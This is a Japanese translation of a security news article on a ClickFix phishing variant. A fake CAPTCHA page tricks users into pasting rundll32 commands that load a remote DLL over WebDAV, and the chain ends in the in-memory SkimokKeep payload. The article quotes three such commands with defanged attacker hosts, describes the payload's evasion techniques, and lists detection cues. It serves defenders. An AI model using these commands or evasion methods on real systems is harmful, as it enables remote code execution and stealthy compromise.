TokyoBlackHatNews

gbhackers.com 5分で読了

ClickFixがRundll32とWebDAVを使用してPowerShellの検出を回避

PowerShellやmshaなどの一般的に監視されているツールからの実行をシフトさせ、代わりにrundll32.exeやWebDAVなどのネイティブWindowsコンポーネントを悪用するClickFix攻撃テクニックの新しい亜種。

この進化により、攻撃者は従来のスクリプトベースの検出メカニズムを回避することができ、成功した隠密な侵害の可能性が高まります。

攻撃は以前のClickFixキャンペーンと同様に始まります。被害者は「healthybyhillary[.]com」などのCAPTCHAページに見せかけたフィッシングサイトへ誘導されます。

CyberProof脅威研究チームは、ClickFixテクニックの新しい亜種を観察しました。これは、攻撃者がWin + Rショートカットを通じてユーザーを操作して悪意のあるコマンドを実行させるものです。

Image

ページはユーザーに「Win + R」を使用してWindowsの実行ダイアログを開き、コマンドを貼り付けてEnterを押すように指示しています。このソーシャルエンジニアリングトリックはユーザーに悪意のあるコマンドを実行させます。

  • rundll32.exe \ser-fluxa[.]omnifree[.]in[.]net@80\verification.
  • rundll32.exe \data-x7-sync.neurosync[.]in[.]net@80\verification.
  • rundll32.exe \mer-forgea.sightup[.]in[.]net@80\verification.

これらのコマンドは\server@port構文を使用してWindows WebDAVミニリダイレクタを活用します。これにより、HTTP(ポート80)でホストされたリモートファイルをローカルネットワーク共有のようにアクセスできます。

Image

Rundll32はダウンロードされたDLLからエクスポートされた関数を、名前付き関数の代わりに序数「#1」を使用して実行し、分析と検出をより難しくします。

マルチステージ感染チェーン

実行されると、rundll32は「verification.google」という名前の悪意のあるDLLを取得し、メモリ内で直接実行します。

攻撃チェーンはPowerShellに移行し、Invoke-Expression(IEX)やNet.WebClient.DownloadStringなどのコマンドを使用して追加のペイロードがダウンロードされます。

PowerShell実行は「-NoP」および「-NonI」などのフラグを使用して可視性を低減し、ユーザーインタラクションを回避し、SkimokKeepとして特定されるセカンダリペイロードが展開されます。

Image

このペイロードはメモリ内で完全に動作し、高度な回避テクニックを使用します。Process Environment Block(PEB)をウォークしてAPI関数を動的に解決し、セキュリティツールで一般的にフラグされるスタティックインポートを回避します。

また、VirtualProtectを使用して実行時にインポートアドレステーブル(IAT)を操作し、フットプリントをさらに削減します。

Image

SkimokKeepロードには、検出を回避するために設計された複数の分析対策機能が含まれています:

  • DJB2スタイルハッシュを使用した動的API解決。
  • ディスクにファイルを書き込まずにメモリ内で実行。
  • プロセス注入とメモリ修正アクティビティ。

また、次のようなアンチVMおよびアンチサンドボックスチェックも実行します:

  • GetSystemMetricsおよびGetDesktopWindowを使用してスクリーン解像度とデスクトップの存在を確認。
  • GetForegroundWindowおよびGetFocusを使用してアクティブなユーザーインタラクションを確認。
  • サンドボックス加速を識別するための異常なシステム時間動作を検出。
  • システムロケールとOSバージョンの不一致を検査。

さらに、GetTickCountでのタイミングチェックとプロセスおよびスレッドIDに基づくロジック操作を含むアンチデバッグテクニックが使用されます。これらのテクニックは、分析が疑われた場合に悪意のあるソフトウェアが動作を変更または実行を終了するのに役立ちます。

検出機会

  • davclnt.dllや@80構文などのWebDAV関連の引数を使用したrundll32.exeの実行。
  • rundll32.exeによって開始されるアウトバウンドHTTP接続。
  • リモートDLL実行を参照する疑わしいコマンドラインパターン。
  • PowerShellまたはmshaを含むフォローアップアクティビティ。
  • 疑わしい外部ドメインへの接続。

セキュリティチームはKQLベースの検索クエリを使用して、WebDAVパスを含む異常なrundll32動作を識別することもできます。

Image

この新しいClickFix亜種は、信頼できるシステムバイナリ(LOLbins)に依存するファイルレス、ユーザー主導の攻撃への増加傾向を強調しています

rundll32やWebDAVなどのあまり精査されていないコンポーネントへ実行を厳密に監視されるスクリプティングエンジンからシフトさせることで、攻撃者は検出表面を大幅に削減します。

主にスクリプトベースの監視に依存する組織はこのアクティビティを完全に見逃すかもしれません。コマンドライン実行、ネットワーク動作、およびLOLbin悪用への可視性を強化することは、これらの進化する脅威を検出するために重要になります。

翻訳元: https://gbhackers.com/rundll32-and-webdav/

ソース: gbhackers.com
#ClickFix #LOLBins #Rundll32 #SkimokKeep #WebDAV #フィッシング #ペイロード配信 #マルウェア #メモリ内実行 #検出回避

関連記事

盗まれたGemini APIキーが自動化されたTelegramの影響工作に悪用

KMW CCTVの深刻な脆弱性、監視映像への不正アクセスを許容

ロシア高官のスマートフォンに外国製スパイウェア——大規模サイバー諜報作戦が発覚